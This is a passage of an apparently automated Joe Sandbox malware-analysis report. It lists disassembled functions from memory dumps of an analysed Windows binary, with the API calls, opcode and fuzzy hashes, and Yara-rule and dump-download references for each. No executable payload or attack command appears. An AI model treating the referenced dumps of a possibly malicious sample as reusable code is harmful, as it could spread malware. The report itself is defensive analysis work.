                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1329076fe4b5865ae383fa8686dc8d0d455ae08cf90faa6a1137f3bf821cc9f4
                                                                                                                                                                                                                                                                                        • Instruction ID: f3e34fa27820fff91d58afd4bbe0e339bc866d2cac87369b20c495604a6722e3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1329076fe4b5865ae383fa8686dc8d0d455ae08cf90faa6a1137f3bf821cc9f4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8E01A76C00208DFCB409FA0D908A5DBBB1EB48311F20840AE90AE3250C7385941FF00
                                                                                                                                                                                                                                                                                        Function 00F5EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F5EC4A
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F5EC54
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F5EC60
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 00F5EC81
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 79f30cdba3e1f55211d187543b20a77a03497533080d2ce98df31c2ec8535c23
                                                                                                                                                                                                                                                                                        • Instruction ID: 9893406fb8cd1ca4b5584ab4b1e516332ad5cc1c2e2e3481f34bb5eab0411198
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79f30cdba3e1f55211d187543b20a77a03497533080d2ce98df31c2ec8535c23
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44E046B6C00208EFCF409FA0D908A5DBBB1FB48310F20840AF80AE32A0CB386901FF00
                                                                                                                                                                                                                                                                                        Function 00F757CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
                                                                                                                                                                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F75919
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                        • String ID: *$LPT
                                                                                                                                                                                                                                                                                        • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                        • Opcode ID: 61def2d25ca7492cd93bbff973b22fdb5814c9458ff8a7ea534b897af6bd7f01
                                                                                                                                                                                                                                                                                        • Instruction ID: f61e3988334fe5880c6b715c336272890fa1af03659ba3d4c105e760dfef72f3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61def2d25ca7492cd93bbff973b22fdb5814c9458ff8a7ea534b897af6bd7f01
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15918C75A00604DFDB14CF54C884EA9BBF1AF44714F18C09AE8495F3A2C775EE86EB92
                                                                                                                                                                                                                                                                                        Function 00F2E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00F2E67D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                        • String ID: pow
                                                                                                                                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                        • Opcode ID: 6663be8279f0f6ebe6cdf4a7f93e0ae6b23e054c5fe3ba8315fc86992309a22e
                                                                                                                                                                                                                                                                                        • Instruction ID: bff27cf51bb9ef38a90aae91f654fa21fa851046f7faed6d6c6b23fa058dcbbf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6663be8279f0f6ebe6cdf4a7f93e0ae6b23e054c5fe3ba8315fc86992309a22e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89518EA2E2930686CB157714ED0136A7FA0EB507B0F304D58F095463E8DF3D8D97BA46
                                                                                                                                                                                                                                                                                        Function 00F1A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: #
                                                                                                                                                                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                        • Opcode ID: b456b830014b55d86de7e73c7e62da537de762cc2221860089e7a3697489f7f0
                                                                                                                                                                                                                                                                                        • Instruction ID: adf3d580e1d03250bccc68ba0bdb11ea6b7dcaffa2de75c3676bccc3a4d65100
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b456b830014b55d86de7e73c7e62da537de762cc2221860089e7a3697489f7f0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD511131906246DFCB25DF28C481AFA7BA0EF16360F644055ED91AB2D0DB389D87FB61
                                                                                                                                                                                                                                                                                        Function 00F1F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00F1F6DB
                                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F1F6F4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: 503a5a80ba717af3cd2327b89c928be5a1b6de3633d63066f5d6921db92e95ae
                                                                                                                                                                                                                                                                                        • Instruction ID: 25b6e3568e1de70e2c3af50e5ecf21c84313c54b2aa9d6fa9f75c01c968ad7a7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 503a5a80ba717af3cd2327b89c928be5a1b6de3633d63066f5d6921db92e95ae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69515771918748ABD320AF14DC86BAFBBE8FF84340F818C5DF1D9411A1DB358529EB66
                                                                                                                                                                                                                                                                                        Function 00F861A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                        • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                        • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                        • Opcode ID: 369efde80de800e2df4631b0723446c2e3a8b799cb9f4f6d1e595a914e7259bc
                                                                                                                                                                                                                                                                                        • Instruction ID: abf047b53546880df05b571e4a150b95d9b6ea75cb87b62059a4c67367513f2b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 369efde80de800e2df4631b0723446c2e3a8b799cb9f4f6d1e595a914e7259bc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1041CF31E002199FCF00EFA8C8859EEBBB5FF59364F104169E405E7252E7749D81EBA0
                                                                                                                                                                                                                                                                                        Function 00F7DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F7DB75
                                                                                                                                                                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F7DB7F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                        • String ID: |
                                                                                                                                                                                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                        • Opcode ID: ebc1a0a238d88709d6a7892de84254e1c07405b61b4d446dcee02534f8d4e26c
                                                                                                                                                                                                                                                                                        • Instruction ID: 4ef7e2bc2df7e1f69d80d3f22f12c197b70cad46ebc9e6f749feac6d719800a1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebc1a0a238d88709d6a7892de84254e1c07405b61b4d446dcee02534f8d4e26c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2316F72C01119ABCF05DFA4CC85EEEBFB9FF04354F504029F815A6162EB759906EB51
                                                                                                                                                                                                                                                                                        Function 00F94008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00F940BD
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F940F8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                        • Opcode ID: 6c5e0150e4ca59feb96b241d7b01aee8d68413928e5ff92b2d452272f864c4bc
                                                                                                                                                                                                                                                                                        • Instruction ID: 7eb32b7e492b0564d701e91cc46053b449c3ef8dcd0d214020129a8c234e8b6e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c5e0150e4ca59feb96b241d7b01aee8d68413928e5ff92b2d452272f864c4bc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB319071510604AAEB24DF74CC80FFB77A9FF58760F108619FAA587190DA75AC82EB60
                                                                                                                                                                                                                                                                                        Function 00F94FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F950BD
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F950D2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID: '
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                        • Opcode ID: 913d0977195aba6c617d2d347683dbb6391b11dc20f1f1f2ba5d75accf662b7a
                                                                                                                                                                                                                                                                                        • Instruction ID: 1a1c959588a2f9fff50cb813b2e8f6c501d9ba4bca9cc3ae1a44304ce2bf0f68
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 913d0977195aba6c617d2d347683dbb6391b11dc20f1f1f2ba5d75accf662b7a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F314875A0160A9FEF05CFA9C880BDE7BB5FF49700F10406AE904AB3A1D771A945DF90
                                                                                                                                                                                                                                                                                        Function 00F93C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F93D18
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F93D23
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                        • String ID: Combobox
                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                        • Opcode ID: 64da22cbc902da278fd6692ec89eff6421959d643ebc97ed208c3d421bc2b2b3
                                                                                                                                                                                                                                                                                        • Instruction ID: 55e588c8310924711eaaa48e1647776b0b6e9dd6bc208c1a6722d319edff4322
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64da22cbc902da278fd6692ec89eff6421959d643ebc97ed208c3d421bc2b2b3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F11B271B0060C6FFF119F54DC91FAB3BABEB843A4F104125F91997290D671DD51A7A0
                                                                                                                                                                                                                                                                                        Function 00F941AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F078B1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: GetStockObject.GDI32(00000011), ref: 00F078C5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F078CF
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F94216
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 00F94230
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                        • Opcode ID: fc348d50d20789a2716e271eae8513aa51a67fb1deaa72d25632cebac711cb13
                                                                                                                                                                                                                                                                                        • Instruction ID: 7561242e2f7b46c140df2312f9c43f93c5b5ecd226b89f2213a60910a619286a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc348d50d20789a2716e271eae8513aa51a67fb1deaa72d25632cebac711cb13
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08112372A10209AFEF00DFB8CC45EEA7BE8FB18354F114925F965E3250E635E851EB60
                                                                                                                                                                                                                                                                                        Function 00F7D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F7D7C2
                                                                                                                                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F7D7EB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                        • String ID: <local>
                                                                                                                                                                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                        • Opcode ID: 80c6972a15096404a2b04b3cbdfcfb727d36f40da2637c3516411b084e812600
                                                                                                                                                                                                                                                                                        • Instruction ID: 1f015655afe3ff9521e98a9cefeeeaff4798bca876350ed88e1aed17a1f7d040
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80c6972a15096404a2b04b3cbdfcfb727d36f40da2637c3516411b084e812600
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0011067250123279D7384B628C45FE7BEACEF127B8F50822BB50D93080D2608842E6F2
